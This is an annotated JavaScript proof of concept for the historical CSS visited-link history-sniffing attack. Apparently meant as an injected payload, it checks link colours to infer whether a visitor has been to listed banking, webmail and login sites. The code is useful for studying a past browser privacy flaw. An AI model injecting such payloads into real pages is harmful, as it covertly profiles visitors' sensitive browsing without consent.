CSS history knocker — a proof of concept that infers which of a fixed list of URLs the visitor has been to, by inserting a temporary link for each one, reading the colour the browser resolves for it, and comparing that with a hard-coded colour (rgb(0, 0, 255), presumably the page's a:visited colour). Modern browsers deliberately report unvisited styling to script for exactly this reason, so treat it as a historical technique. See:
http://jeremiahgrossman.blogspot.cz/2006/08/i-know-where-youve-been.html
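// Browser identification for the history probe below.
// NOTE(review): the original test was `agent.indexOf("mozilla") != -1`, but
// practically every browser (IE, Chrome, Safari, Opera included) sends a UA
// string that begins with "Mozilla/…", so that sniff was always true and did
// not select Gecko at all. What stealHistory() actually relies on is
// document.defaultView.getComputedStyle, so detect that feature directly
// instead of guessing from the UA string.
// `agent` is kept for any other consumer of the global: the lower-cased UA
// string, or '' when there is no navigator (e.g. outside a browser).
var agent = (typeof navigator !== 'undefined' && navigator.userAgent)
  ? String(navigator.userAgent).toLowerCase()
  : '';
// true only when the computed-style API the probe needs is available.
var is_mozilla = typeof document !== 'undefined'
  && !!document.defaultView
  && typeof document.defaultView.getComputedStyle === 'function';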
// Candidate URLs to probe. Each one is turned into a temporary link and its
// resolved colour is checked; only the URLs in this list can ever be reported,
// so the "history" recovered is really membership in this fixed set.
// The two seoblackhat entries differ by a trailing slash and are kept as
// separate probes; the list is otherwise in its original order, which is also
// the order results are written out in.
var websites = [
  'http://ajaxian.com/',
  'http://digg.com/',
  'http://english.aljazeera.net/HomePage',
  'http://ha.ckers.org',
  'http://ha.ckers.org/blog/',
  'http://jeremiahgrossman.blogspot.com/',
  'http://login.yahoo.com/',
  'http://mail.google.com/',
  'http://mail.yahoo.com/',
  'http://my.yahoo.com/',
  'http://reddit.com/',
  'http://seoblackhat.com',
  'http://slashdot.org/',
  'http://techfoolery.com/',
  'http://weblogs.asp.net/jezell/',
  'http://www.amazon.com/',
  'http://www.aol.com/',
  'http://www.bankofamerica.com/',
  'http://www.bankone.com/',
  'http://www.blackhat.com/',
  'http://www.blogger.com/',
  'http://www.bloglines.com/',
  'http://www.bofa.com/',
  'http://www.capitalone.com/',
  'http://www.cenzic.com',
  'http://www.cgisecurity.com',
  'http://www.chase.com/',
  'http://www.citibank.com/',
  'http://www.cnn.com/',
  'http://www.comerica.com/',
  'http://www.e-gold.com/',
  'http://www.ebay.com/',
  'http://www.etrade.com/',
  'http://www.expedia.com/',
  'http://www.google.com/',
  'http://www.hsbc.com/',
  'http://www.icq.com/',
  'http://www.jailbabes.com',
  'http://www.microsoft.com/',
  'http://www.msn.com/',
  'http://www.myspace.com/',
  'http://www.ntobjectives.com',
  'http://www.passport.net/',
  'http://www.paypal.com/',
  'http://www.sourceforge.net/',
  'http://www.spidynamics.com',
  'http://www.statefarm.com/',
  'http://www.usbank.com/',
  'http://www.wachovia.com/',
  'http://www.wamu.com/',
  'http://www.watchfire.com',
  'http://www.webappsec.org',
  'http://www.wellsfargo.com/',
  'http://www.whitehatsec.com',
  'http://www.xanga.com/',
  'http://www.yahoo.com/',
  'http://seoblackhat.com/',
  'http://www.alexa.com/',
  'http://www.youtube.com/',
  'https://banking.wellsfargo.com/',
  'https://commerce.blackhat.com/',
  'https://online.wellsfargo.com/',
];
/* Guard against the payload running more than once on the same page: a marker
   <div id="xss_flag"> is appended on the first run and checked on later loads. */
if (! document.getElementById('xss_flag')) { | |
var d = document.createElement('div'); | |
d.id = 'xss_flag'; | |
document.body.appendChild(d); | |
var d = document.createElement('table'); | |
d.border = 0; | |
d.cellpadding = 5; | |
d.cellspacing = 10; | |
d.width = '90%'; | |
d.align = 'center'; | |
d.id = 'data'; | |
document.body.appendChild(d); | |
/* launch steal history */ | |
if (is_mozilla) { | |
stealHistory(); | |
} | |
function stealHistory() {
  // For each candidate URL: mount a temporary <a> in the body, ask the engine
  // for the colour it resolved for that link, detach the element again, and
  // report the URL when the colour matches the hard-coded "visited" colour.
  //
  // NOTE(review): the match value rgb(0, 0, 255) only works if the hosting
  // page styles a:visited with that exact colour — that CSS is not part of
  // this file, confirm it is present wherever this script is embedded.
  // NOTE(review): document.write() after the document has finished loading
  // implicitly reopens it and discards the existing DOM, including the #data
  // table the caller builds; this only behaves as intended while the parser is
  // still open. A DOM insertion would be the safer output path.
  // NOTE(review): current browsers report unvisited styling to script
  // regardless of history, so this probe yields no hits on them.
  websites.forEach(function (url, idx) {
    var probe = document.createElement("a");
    probe.id = "id" + idx;
    probe.href = url;
    // url comes from the fixed list above, not from user input; innerHTML is
    // still not the safest assignment (textContent would be) if that changes.
    probe.innerHTML = url;
    document.body.appendChild(probe);
    var resolved = document.defaultView
      .getComputedStyle(probe, null)
      .getPropertyValue("color");
    document.body.removeChild(probe);
    if (resolved === "rgb(0, 0, 255)") {
      document.write('' + url + '');
    }
  });
}